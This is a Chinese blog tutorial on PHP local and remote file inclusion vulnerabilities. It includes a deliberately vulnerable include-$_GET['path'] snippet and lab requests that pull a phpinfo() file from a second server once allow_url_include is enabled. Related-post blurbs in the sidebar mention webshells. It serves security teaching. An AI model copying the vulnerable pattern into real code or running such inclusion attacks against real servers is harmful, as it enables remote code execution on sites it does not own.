【文件包含漏洞02】文件包含漏洞原理及本地远程两种攻击方式

已于 2022-07-01 04:42:56 修改
阅读量4.7k 收藏 12
点赞数 1
分类专栏: # 筑基07:WEB漏洞原理 文章标签: php 安全 web安全 文件包含 include
于 2022-03-10 11:34:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123388521
版权

目录

1 文件包含漏洞

1.1 概述

  1. 概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
  2. 文件包含分类:
    (1)本地文件包含LFI(local file include)当被包含的文件在服务器本地时,就形成本地文件包含。
    (2)远程文件包含RFI(remote file include)当被包含的文件在第三方服务器时,叫做远程文件包含。
  3. 文件包含漏洞分类:
    (1)本地文件包含漏洞:当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
    (2)远程文件包含漏洞:当php.ini 中的配置选项allow_url_fopen和allow_url_include均为ON的话,则包含的文件可以是第三方服务器中的文件,这样就形成了远程文件包含漏洞。
  4. 背景:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。

1.2 原因

  1. 原因一:Web应用使用了动态包含。如以下代码,在第2行中定义了变量path并赋值,在第5行中文件包含了该变量。
<?php
$path = "./inc.php";
include ("./inc.php");
echo "<h1>This is include.php!</h1>";
include $path;
?>
  1. 原因二:动态包含的文件路径参数,客户端可控。如以下代码,变量path是从客户端请求中获取的,是用户可以控制的。
<?php
$path = $_GET['path'];
include ("./inc.php");
echo "<h1>This is include.php!</h1>";
include $path;
?>
  1. 原因三:未对用户输入参数进行全面过滤。

1.3 危害

  1. 严重性:一旦服务器存在文件包含漏洞,基本上会致使一切防御失效。像中国蚁剑、大马等,很多时候过不了安全狗,但是如果存在文件包含则可以利用该漏洞过狗。
  2. 两个特点:
    1. 无视文件扩展名读取文件。包含文件时,PHP会读取文件的源码,包括图片文件等。
    2. 无条件解析PHP代码。文件包含在读取文件源码的同时,如果遇到符合PHP语法规范的代码,就会无条件执行。

2 攻击实验

2.1 实验环境

  1. 本文实验基于WAMP环境进行测试,环境部署过程参考文章《win2008R2SP1+WAMP环境部署》。
  2. 在该环境网站根目录下,新建文件夹test,在test文件夹下新建以下文件进行实验。
  3. 新建一个txt文件,输入以下代码,并重命名为include.php。
<?php
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include $path;
?>

2.2 实验一:本地文件包含攻击

  1. 通过文件上传等其他手段,在网站目录及子目录下生成了info.php文件,文件代码如下:<?php phpinfo();?>
  2. 在真实机访问该网站,输入URL为http://192.168.1.4/test/include.php时,显示结果如下。由于代码第二行的path没有传入,弹出了提示;在第四行文件包含语句没有找到对应的文件,弹出警告。
    在这里插入图片描述
  3. 将URL修改为http://192.168.1.4/test/include.php?path=info.php,显示结果如下。可以看到参数成功传入给path,并在文件包含语句中被执行,也就是说存在于本地的一个文件被客户端控制着执行了,如果这个文件来历不明存在恶意代码则服务器被攻击。
    在这里插入图片描述

2.3 实验二:远程文件包含攻击

  1. 靶机上的网站和文件和实验一一样。

  2. 准备攻击靶机,让靶机的include.php文件以远程文件包含的方式来执行info.php,浏览器访问时将URL修改为http://192.168.1.4/test/include.php?path=http://192.168.1.4/test/info.php。可以看到网页显示如下,说该靶机服务器不允许include函数调用远程文件。
    在这里插入图片描述

  3. 这时候,如果靶机服务器的配置文件php.ini中将allow_url_include参数配置为On,就存在着被利用远程文件包含攻击的危险。将靶机配置文件修改如下并重启phpstudy。
    在这里插入图片描述

  4. 真实机浏览器再次访问http://192.168.1.4/test/include.php?path=http://192.168.1.4/test/info.php。可以看到远程文件被执行。
    在这里插入图片描述

  5. 上面的方式是以远程文件包含的方式访问本地的文件,接下来演示真的以远程文件包含的方式访问远程文件。这需要我们在另一台虚拟机系统上部署另一个网站,该网站上存在一个文件info.php,文件代码如下:<?php phpinfo();?>。该文件的网络地址为http://192.168.1.7/info.php
    在这里插入图片描述

  6. 真实机浏览器访问http://192.168.1.4/test/include.php?path=http://192.168.1.7/info.php。可以看到远程文件被执行,此时执行的文件位于第二台服务器上,PHP版本与第一台不一样。
    在这里插入图片描述

2.4 实验对比

实验一执行phpinfo()语句是在靶机本地,所以返回的PHP版本为5.4.45;实验二中第一次执行phpinfo()是本地的文件,PHP版本为5.4.45,第二次执行的phpinfo()是在另一个服务器上,只是将执行结果反馈给靶机,所以返回的PHP版本是5.2.17。

3 总结

  1. 理解文件包含漏洞产生的原因;
  2. 掌握本地与远程利用漏洞的方式。
Fighting_hawk
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程文件包含原理及利用
G3et的博客
01-27 687
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
实验38:远程文件包含漏洞案例讲解和演示
qq_44720671的博客
05-12 673
远程文件包含漏洞案例讲解和演示 可以通过php协议实现远程文件包含,这个include默认是关闭的,我们可以手动给他打开 远程包含漏洞危害级别要高出本地的很多,因为本地的利用是有限的,我们还需要去猜这个配置文件的漏洞,危害自然就低一些 比如我们可以在远端写一个一句话木马,放到本地去执行,实现了目标站点的远程控制 我们以pikachu为例,打开此页面 我们发现 在测试站点中,直接写了一个fop...
文件包含攻击
web13985085406的博客
05-16 516
文件包含:将本地可复用的文件利用包含函数在当前页面中执行。(将文件以脚本执行) 如果某个页码具有这种功能,并且在这个包含的过程中,被包含的函数名可通过参数的方式被用户端控制,那么就可能存在文件包含漏洞文件包含漏洞指当PHP函数引入文件时,没有合理校验传入的文件名,从而操作了预想之外的文件,导致以外的文件泄露甚至恶意的代码注入。 在PHP环境下,可利用include、require、include_once、require_once函数调用文件,实现文件包含的效果。 漏洞原理原理就职注入一段用户能控制
文件包含漏洞远程文件包含
Xiongcanne的博客
04-25 958
所需服务器:kalilinux apache2 打开靶机删除原有的一句话木马 使用kali打开apache2 在kali其中html文件夹中创建一个txt文件 键入i输入创建一句话木马的代码 我们使用浏览器打开txt文件,可以看到含有该代码 文件包含该链接,使其执行其中代码 成功创建一句话木马 接着就用中国蚁剑连接就行了。 ...
干货:网站常见文件上传漏洞攻击手法和防范
最新发布
03-20 1374
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上传可执行亩疟疚募H绯
文件包含漏洞原理
m0_68019293的博客
03-29 7555
什么是文件包含漏洞 1:随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。 经常见到的函数 1:include()当前使用该函数包含文件时,只有代码执行到include()函数时将文件包含起来,发生错误时给出一个警告,然后继续执行语句 2,include_once()功能和include()相同,区别当重复调
网络安全文件包含漏洞总结
kali_Ma的博客
03-10 2187
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
详解文件包含漏洞及其解决方法
2301_77004573的博客
04-29 1710
文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。注:(包含:程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写)例如我们在写c语言编程时的include就是个包含的应用。
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1277
Web安全领域的探索之远程文件包含漏洞(LFI)
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2036
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
远程文件包含shell
WYJ____的博客
08-06 3355
一 预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 远程文件包含shell 实验工具 火狐浏览器菜刀软件工具 实验环境 客户机一台(操作系统为Windows Server 2003)服务器一台(操作系统为Windows Server 2003) 实验步骤 1、访问127.0.0...
计算机网络安全基础试题及答案..doc
06-07
8,黑客必须完成以下两种工作才能监听交换网络:让交换机发送通信给交换网络, 或者让交换机发送通信给所有端口。 9.通过复制mac或者哄骗arp或点dns,可以欺骗交换机发送通信给嗅闻器. 第四章 攻击 机密性 ...
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
登录时无网络连接(正确答案) 8、从网络攻击的位置来分,可以分为远程攻击和( )两种。[单选题] * A.本地攻击(正确答案) B.主动攻击 C.被动攻击 D.伪远程攻击 9、黑客在攻击中进行端口扫描可以完成( )。[单选题] *...
网络安全技术原理与实践--第一章-网络安全概论.pptx
06-09
网络协议攻击 TCP/IP协议由网间层的IP协议和传输层的TCP协议组成,它定义了网络设备接入Internet的方式及网络设备间传输数据的标准 网络接口层 主要负责定义网络介质的物理特性,包括机械特性、电子特性、功能特性...
黄淮学院\考试题\2010-2011
10-27
A、加密包括对称加密和非对称加密两种 B、信息隐藏是加密的一种方法 C、如果没有信息加密的密钥,只要知道加密程序的细节就可以对信息进行加密 D、密钥的位数越多,信息的安全性就越高 可以认为数据的加密和解密是...
网络安全简答题.doc
06-09
就是一种防范远程攻击的重要技术手段,能够对潜在的入侵动作做 出记录,并且能够预测攻击的后果。(1分) 2、防范远程攻击的管理措施有那些? 答:防范远程攻击的管理措施: (1) 使用系统最高的安全级别。高安全等级的系统...
主要的Web攻击类型和防御方法
qq_44430237的博客
05-16 662
遍历是指按照一定的顺序依次访问数据结构中的每个元素的过程。击穿攻击(Web Hammering)指的是攻击者在很短时间内对同一网络资源发起大量并发请求,旨在超出系统的负载上限从而使其发生饱和,造成效率下降甚至瘫痪。总的来说,要采用多层防御 -- 从底层资源主机,到系统架构,再到应用层的负载控制。缓冲区溢出(Buffer Overflow):攻击者通过输入过长的输入,超过程序缓存区大小,来执行任意代码。总的来说,要实施完善的身份认证机制,合理配置会话管理, 同时增强用户的安全意识,方可有效防范相关攻击
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 2742
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
【渗透测试基础】文件读取
javaEE_zero的博客
12-16 368
文件读取、文件包含
简述文件包含漏洞原理
06-13
文件包含漏洞原理Web应用程序在调用其他文件时没有进行充分的过滤和检查,导致攻击者可以通过构造恶意的参数来访问非授权的文件,并执行其中的代码。常见的文件包含漏洞两种类型:本地文件包含远程文件包含。本地文件包含漏洞是指攻击者通过构造恶意的参数,访问服务器上已经存在的本地文件,并执行其中的代码。远程文件包含漏洞是指攻击者通过构造恶意的参数,访问远程服务器上的文件,并将其中的代码包含到应用程序中执行。 攻击者可以利用文件包含漏洞来执行各种恶意操作,如读取或者修改敏感数据、执行系统命令、获取服务器的控制权等。因此,文件包含漏洞是一种非常危险的网络安全漏洞。为了防止文件包含漏洞,应用程序需要对所有输入参数进行严格的检查和限制,禁止包含外部文件,并对所有用户输入的数据进行过滤和转义,从而消除恶意代码的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值